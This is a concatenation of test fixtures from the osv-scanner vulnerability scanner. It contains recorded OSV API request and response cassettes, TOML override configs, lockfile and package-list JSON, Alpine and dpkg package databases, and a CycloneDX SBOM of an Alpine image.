proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OffLinux/ssh_version_errors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OffLinux/ssh_version_is_after_last_vuln_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OffLinux/ssh_version_is_before_first_vuln_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_WithDetector_OnLinux.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 
proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OnLinux/ssh_version_errors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OnLinux/ssh_version_is_after_last_vuln_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_WithDetector_OnLinux/ssh_version_is_before_first_vuln_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/config-invalid/osv-scanner-test.toml ================================================ ! 
================================================ FILE: cmd/osv-scanner/scan/source/testdata/exp-plugins-pkgdeprecate/deprecated-vuln/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/go-version-config.toml ================================================ GoVersionOverride = "1.21.7" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/nested/go-version-config.toml ================================================ GoVersionOverride = "1.21.7" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/nested/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/nested/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/go-project/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-git/osv-scanner.json ================================================ { "results": [ { "packages": [ { "//1": "version and commit are the same, so rust-openssl advisories should be reported", "//2": "note online reports CVE-2023-6180 as well due to matching commits for an implicit fork", "package": { "name": "https://github.com/sfackler/rust-openssl", "commit": "0f428d190410263e4daa65b917c0e84707a9c0ef", "version": 
"openssl-v0.8.1" } }, { "//1": "repo is different to the advisory, so only online checking will report anything", "package": { "name": "https://github.com/sfackler-fork/rust-openssl", "commit": "3b064fdb022912bbb98f5b8d9d111aeb6fec8f79", "version": "openssl-v0.10.23" } }, { "//1": "no version, so only online checking will report anything", "package": { "name": "https://github.com/openssl/openssl", "commit": "45fda76bc1b9fd74d10e85e0ce9b65a12dcc58b0" } }, { "//1": "version is for 3.5.0 which is vulnerable to CVE-2025-3416, but commit is for 3.5.1 which is not", "package": { "name": "https://github.com/openssl/openssl", "commit": "aea7aaf2abb04789f5868cbabec406ea43aa84bf", "version": "openssl-3.5.0" } }, { "//1": "commit is for a completely different repository that does have vulns", "package": { "name": "https://github.com/apache/orc", "commit": "17b30e96476be70b8773b2b807bab857fd3ceb39", "version": "v3.19.0" } }, { "//1": "matches an advisory whose repo url does not start with the http protocol, which should not matter", "package": { "name": "http://github.com/boostorg/boost", "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7", "version": "boost-1.67.0" } }, { "//1": "matches an advisory whose repo url does not start with the git protocol, which should not matter", "package": { "name": "git://github.com/boostorg/boost", "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7", "version": "boost-1.67.0" } }, { "//1": "matches an advisory even though the repo url has no protocol, which should not matter", "package": { "name": "github.com/boostorg/boost", "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7", "version": "boost-1.67.0" } }, { "//1": "matches an advisory whose repo url ends with .git, which should not matter", "package": { "name": "https://github.com/boostorg/boost", "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7", "version": "boost-1.67.0" } }, { "//1": "matches an advisory whose repo url does not end with .git, which should not matter", "package": {
"name": "https://github.com/capricorn86/happy-dom.git", "commit": "f82211036f434593c69b8e3680ea65203a46d315", "version": "v11.1.0" } }, { "//1": "matches advisories whose repo urls are a different case, which should be respected", "//2": "note in future this might change for github and gitlab, as they are not case-sensitive", "package": { "name": "https://github.com/Exiv2/exiv2", "commit": "931a40a746f5678dcc4625b06a2eb25fa4f00b34", "version": "v0.28.0" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-gitignore/subdir/test.gitignore ================================================ Gemfile.lock ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-gitignore/test.gitignore ================================================ ignored /yarn.lock composer* ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/my-package-lock.json ================================================ { "requires": true, "lockfileVersion": 1, "dependencies": { "ansi-html": { "version": "0.0.1" } } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner-custom-git-tag.json ================================================ { "results": [ { "source": {}, "packages": [ { "package": { "name": "github.com/openssl/openssl", "version": "openssl-3.0.4", "ecosystem": "GIT" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner-custom.json ================================================ { "results": [ { "source": {}, "packages": [ { "package": { "name": "stdlib", "version": "1.99.9", "ecosystem": "Go" } } ] }, { "source": {}, "packages": [ { "package": { "name": "toolchain", "version": "1.99.9", "ecosystem": "Go" } } ] } ] } ================================================ FILE: 
cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner-flutter-deps.json ================================================ { "results": [ { "packageSource": { "path": "/path/to/engine/DEPS", "type": "lockfile" }, "packages": [ { "package": { "name": "https://github.com/flutter/buildroot.git", "commit": "5d60bd2eb4642b64d00c845e5ca9f1ea41fd6db6" } }, { "package": { "name": "https://github.com/brendan-duncan/archive.git", "commit": "9de7a0544457c6aba755ccb65abb41b0dc1db70d" } } ] }, { "packageSource": { "path": "/path/to/engine/third_party/accessibility/README.md", "type": "lockfile" }, "packages": [ { "package": { "name": "https://chromium.googlesource.com/chromium/src", "commit": "4579d5538f06c5ef615a15bc67ebb9ac0523a973" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner-with-unscannables.json ================================================ { "results": [ { "source": {}, "packages": [ { "package": { "name": "stdlib", "version": "1.999.1", "ecosystem": "Go" } } ] }, { "source": {}, "packages": [ { "package": { "name": "toolchain", "version": "1.24.4", "ecosystem": "" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner.json ================================================ { "results": [ { "source": {}, "packages": [ { "package": { "name": "stdlib", "version": "1.24.4", "ecosystem": "Go" } } ] }, { "source": {}, "packages": [ { "package": { "name": "toolchain", "version": "1.24.4", "ecosystem": "Go" } } ] } ] } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-insecure/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-licenses/package.json ================================================ { "dependencies": { 
"babel": "^6.23.0", "human-signals": "^5.0.0", "ms": "^2.1.3", "type-fest": "^4.26.1" } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/installed ================================================ C:Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= P:apk-tools V:2.12.10-r1 A:x86_64 S:120973 I:307200 T:Alpine Package Keeper - package manager for alpine U:https://gitlab.alpinelinux.org/alpine/apk-tools L:GPL-2.0-only o:apk-tools m:Natanael Copa t:1666552494 c:0188f510baadbae393472103427b9c1875117136 D:musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 p:so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 F:etc F:etc/apk F:etc/apk/keys F:etc/apk/protected_paths.d F:lib R:libapk.so.3.12.0 a:0:0:755 Z:Q1opjpYqXgzmOVo7EbNe8l5Xol08g= F:lib/apk F:lib/apk/exec F:sbin R:apk a:0:0:755 Z:Q1/4bmOPe/H1YhHRzlrj27oufThMw= F:var F:var/lib F:var/lib/apk ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/not-a-lockfile.toml ================================================ _="whatever this is, it's not a lockfile!" 
================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/osv-scanner-test.toml ================================================ ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/replace-local.mod ================================================ require ( golang.org/x/net v1.2.3 ) replace ( golang.org/x/net v1.2.3 => ./fork/net ) ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many/status ================================================ Package: adduser Status: install ok installed Priority: important Section: admin Installed-Size: 849 Maintainer: redacted Architecture: all Multi-Arch: foreign Version: 3.118 Depends: passwd, debconf (>= 0.5) | debconf-2.0 Suggests: liblocale-gettext-perl, perl Conffiles: /etc/deluser.conf 773fb95e98a27947de4a95abb3d3f2a2 Description: add and remove users and groups This package includes the 'adduser' and 'deluser' commands for creating and removing users. . - 'adduser' creates new users and groups and adds existing users to existing groups; - 'deluser' removes users and groups and removes users from a given group. . Adding users with 'adduser' is much easier than adding them manually. Adduser will choose appropriate UID and GID values, create a home directory, copy skeletal user configuration, and automate setting initial values for the user's password, real name and so on. . Deluser can back up and remove users' home directories and mail spool or all the files they own on the system. . A custom script can be executed after each of the commands. 
================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/alpine.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* 
cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 
/lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* 
cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 
Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa 
<ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.13-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.13-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.13-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ 
alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/installed ================================================ C:Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= P:apk-tools V:2.12.10-r1 A:x86_64 S:120973 I:307200 T:Alpine Package Keeper - package manager for alpine U:https://gitlab.alpinelinux.org/alpine/apk-tools L:GPL-2.0-only o:apk-tools m:Natanael Copa t:1666552494 c:0188f510baadbae393472103427b9c1875117136 D:musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 p:so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 F:etc F:etc/apk F:etc/apk/keys F:etc/apk/protected_paths.d F:lib R:libapk.so.3.12.0 a:0:0:755 Z:Q1opjpYqXgzmOVo7EbNe8l5Xol08g= F:lib/apk F:lib/apk/exec F:sbin R:apk a:0:0:755 Z:Q1/4bmOPe/H1YhHRzlrj27oufThMw= F:var F:var/lib F:var/lib/apk ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/not-a-lockfile.toml ================================================ _="whatever this is, it's not a lockfile!" 
================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/replace-local.mod ================================================ require ( golang.org/x/net v1.2.3 ) replace ( golang.org/x/net v1.2.3 => ./fork/net ) ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-many-with-insecure/status ================================================ Package: adduser Status: install ok installed Priority: important Section: admin Installed-Size: 849 Maintainer: redacted Architecture: all Multi-Arch: foreign Version: 3.118 Depends: passwd, debconf (>= 0.5) | debconf-2.0 Suggests: liblocale-gettext-perl, perl Conffiles: /etc/deluser.conf 773fb95e98a27947de4a95abb3d3f2a2 Description: add and remove users and groups This package includes the 'adduser' and 'deluser' commands for creating and removing users. . - 'adduser' creates new users and groups and adds existing users to existing groups; - 'deluser' removes users and groups and removes users from a given group. . Adding users with 'adduser' is much easier than adding them manually. Adduser will choose appropriate UID and GID values, create a home directory, copy skeletal user configuration, and automate setting initial values for the user's password, real name and so on. . Deluser can back up and remove users' home directories and mail spool or all the files they own on the system. . A custom script can be executed after each of the commands. ================================================ FILE: cmd/osv-scanner/scan/source/testdata/locks-none/README.md ================================================ this directory has no lockfiles at all! 
